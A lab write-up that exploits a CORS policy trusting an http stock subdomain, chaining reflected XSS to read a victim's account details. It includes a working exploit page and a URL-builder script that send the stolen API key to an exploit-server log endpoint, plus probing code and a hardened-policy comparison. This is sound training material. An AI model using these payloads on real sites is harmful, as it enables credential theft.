# Lab 3: CORS vulnerability with trusted insecure protocols

First we log in and capture the following request:

```
GET /accountDetails HTTP/2
Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net
Cookie: session=BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a5000120438c0d181938e1900bb00e7.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i


```

The previous request gets this response:

```
HTTP/2 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "zZYurR0j8yVuO0G4rUgOEQ3BDPCa1k63",
  "sessions": [
    "BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f"
  ]
}
```

Another request is observed when clicking "Check stock":

<figure><img src="/files/SOAia9LKAUuVKZagnpNC" alt=""><figcaption></figcaption></figure>

The request is:

```
GET /?productId=1&storeId=1 HTTP/1.1
Host: stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Connection: keep-alive


```

And the response is:

```
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=xcDseBBRQ3hSmUgsF5uWLEusdjSmvaWk; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 16

Stock level: 394
```

The `/accountDetails` response carries `Access-Control-Allow-Credentials: true`, which is only dangerous if the server also reflects an attacker-controlled Origin. To check, we resend the request with the exploit server as Origin:

```
GET /accountDetails HTTP/2
Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net
Cookie: session=jv44EUnL4EjHlw0QR2FOyfIxJPWolEj3
Origin: https://exploit-0ac800cb046a13ad81b1ce40010f001a.exploit-server.net/
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i


```

But it does not work: no `Access-Control-Allow-Origin` header comes back, so a browser would block a page on the exploit server from reading this response. Note that the Origin header above carries a trailing slash, which a real browser never sends; when testing by hand, use the bare `scheme://host` form.

```
HTTP/2 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "uQASsz6qb00wbSWwMYA3ssCglHbumhoP",
  "sessions": [
    "jv44EUnL4EjHlw0QR2FOyfIxJPWolEj3"
  ]
}
```

So we try the stock subdomain, over plain http, as the Origin:

```
GET /accountDetails HTTP/2
Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net
Origin: http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net
Cookie: session=BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a5000120438c0d181938e1900bb00e7.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i


```

With the http subdomain it works: the Origin is reflected in `Access-Control-Allow-Origin` and `Access-Control-Allow-Credentials: true` is still present, so script running on `http://stock.<lab>` can read the authenticated response, API key included:

```
HTTP/2 200 OK
Access-Control-Allow-Origin: http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "zZYurR0j8yVuO0G4rUgOEQ3BDPCa1k63",
  "sessions": [
    "BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f"
  ]
}
```
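The three probes above (exploit-server origin, then the http stock subdomain) boil down to one rule: the cross-origin read succeeds only when `Access-Control-Allow-Origin` equals the Origin sent and `Access-Control-Allow-Credentials` is `true`. The following is an added example, not code from the original write-up, that encodes that rule, applies it to the two responses captured above (headers reconstructed inline from the captures), and provides a `probeOrigins()` helper for running the same checks against a live instance with Node 18+ `fetch`. The candidate-origin list and the live helper are additions; they are not called here.

```javascript
// Added example (not part of the original write-up): decide, from the response headers,
// whether a given Origin can read an authenticated response cross-origin, and apply that
// rule to the two exchanges captured above. The captured headers are reconstructed inline;
// probeOrigins() is for use against a live instance and is not called here.

// Verdict for one (Origin, response headers) pair. Header names are case-insensitive.
function corsVerdict(origin, headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;
  const acao = h['access-control-allow-origin'];
  const acac = String(h['access-control-allow-credentials'] || '').toLowerCase() === 'true';

  if (acao === undefined) return 'not-allowed';                 // browser blocks the read
  if (acao === '*') return acac ? 'wildcard-credentials-rejected' // browsers refuse * with credentials
                                : 'wildcard-no-credentials';
  if (acao !== origin) return 'allowed-other-origin';           // ACAO names someone else
  return acac ? 'reflected-with-credentials'                    // exploitable from that origin
              : 'reflected-no-credentials';
}

// Origins worth trying when the first probe fails: an arbitrary attacker origin, the
// app's own subdomains over both schemes, and the "null" origin (sandboxed iframes).
function candidateOrigins(labHost, exploitHost) {
  return [
    `https://${exploitHost}`,
    `https://stock.${labHost}`,
    `http://stock.${labHost}`,
    'null',
  ];
}

// Live probe with Node 18+ global fetch: one authenticated request per candidate Origin.
async function probeOrigins(url, cookie, origins) {
  const verdicts = {};
  for (const origin of origins) {
    const res = await fetch(url, { headers: { Origin: origin, Cookie: cookie }, redirect: 'manual' });
    verdicts[origin] = corsVerdict(origin, Object.fromEntries(res.headers));
  }
  return verdicts;
}

// The two exchanges captured on this page, reconstructed from the responses shown.
const LAB_HOST = '0a5000120438c0d181938e1900bb00e7.web-security-academy.net';
const EXPLOIT_HOST = 'exploit-0ac800cb046a13ad81b1ce40010f001a.exploit-server.net';
const CAPTURED = [
  { origin: `https://${EXPLOIT_HOST}`,
    headers: { 'Access-Control-Allow-Credentials': 'true', 'Content-Type': 'application/json; charset=utf-8' } },
  { origin: `http://stock.${LAB_HOST}`,
    headers: { 'Access-Control-Allow-Origin': `http://stock.${LAB_HOST}`, 'Access-Control-Allow-Credentials': 'true' } },
];

function capturedVerdicts() {
  return CAPTURED.map(({ origin, headers }) => ({ origin, verdict: corsVerdict(origin, headers) }));
}

for (const { origin, verdict } of capturedVerdicts()) console.log(`${origin} -> ${verdict}`);
```

Against a live lab, `probeOrigins('https://<lab>/accountDetails', 'session=<cookie>', candidateOrigins(lab, exploitHost))` reports which origins are reflected with credentials; the `http://` subdomain verdict is what makes this lab exploitable.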

Additionally, the stock application reflects `productId` into its page unescaped, so it is vulnerable to reflected XSS:

{% code overflow="wrap" %}

```url
http://stock.0ace001004cb5c4384df4662009c00d6.web-security-academy.net/?productId=4%3Cscript%3Ealert(2024)%3C/script%3E&storeId=1
```

{% endcode %}

<figure><img src="/files/otUQ7X6hOLHeGerLcjcE" alt=""><figcaption></figcaption></figure>

Putting this together, the following exploit is hosted on the exploit server:

```html
<script>
    // Script to be reflected by the stock subdomain through the XSS in productId.
    // It runs in the origin http://stock.<lab>, which the main application trusts,
    // so the XMLHttpRequest is sent with the victim's cookies and the response is readable.
    // '+' is written as %2b: a literal '+' in a query string decodes to a space and would
    // break the script. The closing tag is written as %3c/script> so the HTML parser of this
    // exploit page does not terminate the outer <script> element early; the stock server
    // decodes it back to </script> when it reflects the parameter.
    var payload =
        "<script>" +
        "var req = new XMLHttpRequest();" +
        "req.onload = reqListener;" +
        "req.open('get','https://0a5000120438c0d181938e1900bb00e7.web-security-academy.net/accountDetails',true);" +
        "req.withCredentials = true;" +
        "req.send();" +
        "function reqListener() {" +
        "location='https://exploit-0a2100ff0465c0dd81cd8dbc0104000f.exploit-server.net/log?key='%2bthis.responseText;" +
        "};" +
        "%3c/script>";

    // Redirect the victim's browser to the stock subdomain with the payload in productId
    document.location = "http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net/?productId=4"
        + payload + "&storeId=1";
</script>
```
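Hand-encoding the payload (`%2b`, `%3c`) is error-prone. The following is an added example, not part of the original exploit, that generates the same stock-subdomain URL with `encodeURIComponent` and verifies the round trip by decoding `productId` the way the stock server would. The hosts are the ones used on this page; the round-trip check and the `exploitPageHtml()` wrapper are additions.

```javascript
// Added example (not part of the original exploit): generate the stock-subdomain XSS URL
// with encodeURIComponent instead of hand-encoding it, and verify the round trip.
// encodeURIComponent maps '+' to %2B and '<' / '>' to %3C / %3E, so the injected script
// survives server-side query decoding and the generated HTML never contains a literal
// </script> inside the outer <script> element. Hosts are the ones used on this page.

const LAB_HOST = '0a5000120438c0d181938e1900bb00e7.web-security-academy.net';
const EXPLOIT_HOST = 'exploit-0a2100ff0465c0dd81cd8dbc0104000f.exploit-server.net';

// Script the stock page reflects into its HTML. It runs in the trusted http://stock.<lab>
// origin, so the credentialed read of /accountDetails is allowed by the CORS policy.
// The closing tag is split so this builder can itself be pasted into an HTML page.
function stockPayload(labHost, exploitHost) {
  return [
    '<script>',
    'var req = new XMLHttpRequest();',
    'req.onload = reqListener;',
    `req.open('get','https://${labHost}/accountDetails',true);`,
    'req.withCredentials = true;',
    'req.send();',
    'function reqListener() {',
    `location='https://${exploitHost}/log?key='+this.responseText;`,
    '};',
    '<' + '/script>',
  ].join('');
}

// Final URL the victim is sent to. productId carries the payload, fully percent-encoded.
function buildExploitUrl(labHost, exploitHost) {
  const productId = '4' + stockPayload(labHost, exploitHost);
  return `http://stock.${labHost}/?productId=${encodeURIComponent(productId)}&storeId=1`;
}

// Decode productId the way the stock server would, to confirm nothing was mangled
// (in particular that the '+' in the exfiltration line did not become a space).
function decodedProductId(url) {
  return new URL(url).searchParams.get('productId');
}

// Page body to host on the exploit server: one redirect to the generated URL.
function exploitPageHtml(labHost, exploitHost) {
  const url = JSON.stringify(buildExploitUrl(labHost, exploitHost)); // safe: URL is percent-encoded
  return `<script>document.location=${url};<` + `/script>`;
}

console.log(exploitPageHtml(LAB_HOST, EXPLOIT_HOST));
```

Run it with Node and paste the printed page into the exploit server body; `decodedProductId()` is the check to run whenever a payload is changed, since a single unencoded `+` is enough to turn the injected script into a syntax error.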

In this scenario the lab application at `0a5000120438c0d181938e1900bb00e7.web-security-academy.net` is configured to trust its own subdomains regardless of protocol: an Origin of `http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net` is reflected in `Access-Control-Allow-Origin` together with `Access-Control-Allow-Credentials: true`, while the exploit-server origin was not. Trusting a plain-http origin undermines the https application: script injected into the stock site (here via the reflected XSS, but also by any on-path network attacker, since that origin is unencrypted) can read the authenticated `/accountDetails` response and exfiltrate the API key.
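To make the misconfiguration concrete, the following added example (not the lab's own code, which is not public) models the origin check the captures imply beside a hardened replacement. `vulnerableCorsHeaders()` reflects any subdomain of the application host over http or https; `hardenedCorsHeaders()` compares against an exact allow-list of https origins, sends credentials only on a match, and always emits `Vary: Origin`. The allow-list entry `https://stock.<lab>` and the sample origins are assumptions constructed for the example.

```javascript
// Added example (not the lab's own code, which is not public): a minimal model of the
// origin check described above and a hardened replacement. vulnerableCorsHeaders() trusts
// any subdomain of the application host over http or https, which is what the captures
// show; hardenedCorsHeaders() compares against an exact allow-list of https origins. The
// allow-list entry https://stock.<lab> is an assumption about which client legitimately
// needs credentialed access.

const APP_HOST = '0a5000120438c0d181938e1900bb00e7.web-security-academy.net';

// Vulnerable: "any subdomain, any scheme". Reflecting the Origin together with
// Allow-Credentials: true hands the response to whoever controls that origin,
// and a plain-http origin is controllable by any on-path network attacker.
function vulnerableCorsHeaders(origin, appHost = APP_HOST) {
  const hostPattern = appHost.replace(/\./g, '\\.');
  const trusted = new RegExp(`^https?://([a-z0-9-]+\\.)*${hostPattern}$`, 'i');
  const headers = { 'Access-Control-Allow-Credentials': 'true' }; // always sent, as in the captures
  if (origin && trusted.test(origin)) headers['Access-Control-Allow-Origin'] = origin;
  return headers;
}

// Hardened: exact string match against https-only origins, credentials only when matched,
// and Vary: Origin so a cache never serves one origin's ACAO to another.
const ALLOWED_ORIGINS = new Set([`https://stock.${APP_HOST}`]); // assumption for this example

function hardenedCorsHeaders(origin, allowed = ALLOWED_ORIGINS) {
  const headers = { Vary: 'Origin' };
  if (!origin || !allowed.has(origin)) return headers;     // no ACAO: browser denies the read
  headers['Access-Control-Allow-Origin'] = origin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Compare both policies on a set of origins (constructed for this example).
function comparePolicies(origins) {
  return origins.map((origin) => ({
    origin,
    vulnerable: 'Access-Control-Allow-Origin' in vulnerableCorsHeaders(origin),
    hardened: 'Access-Control-Allow-Origin' in hardenedCorsHeaders(origin),
  }));
}

const SAMPLE_ORIGINS = [
  `http://stock.${APP_HOST}`,                                   // reflected on this page
  `https://stock.${APP_HOST}`,
  `https://anything.${APP_HOST}`,                               // any subdomain, e.g. one with an XSS
  'https://exploit-0ac800cb046a13ad81b1ce40010f001a.exploit-server.net',
  'null',
];
for (const row of comparePolicies(SAMPLE_ORIGINS)) console.log(row);
```

The difference that matters for this lab is the scheme: the regex accepts `http://stock.<lab>` because `https?` makes the `s` optional, while the allow-list rejects it because the string is simply not in the set. Exact matching also closes the "any subdomain" hole, so an XSS on an unrelated subdomain no longer translates into a credentialed read of the main application.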

The exploit server URL is then delivered to the victim, and the following entry appears in the exploit server log:

{% code overflow="wrap" %}

```
10.0.4.192      2024-07-02 16:05:48 +0000 "GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22R79v19o3c806LE3uqDV6jWs3LZUDT6nE%22,%20%20%22sessions%22:%20[%20%20%20%20%22Flkp523j6bUAJX1R1BCgm7vamY3aFjc6%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
```

{% endcode %}

URL-decoding it gives:

{% code overflow="wrap" %}

```json
{
    "username": "administrator",
    "email": "",
    "apikey": "R79v19o3c806LE3uqDV6jWs3LZUDT6nE",
    "sessions": ["Flkp523j6bUAJX1R1BCgm7vamY3aFjc6"]
}
```

{% endcode %}

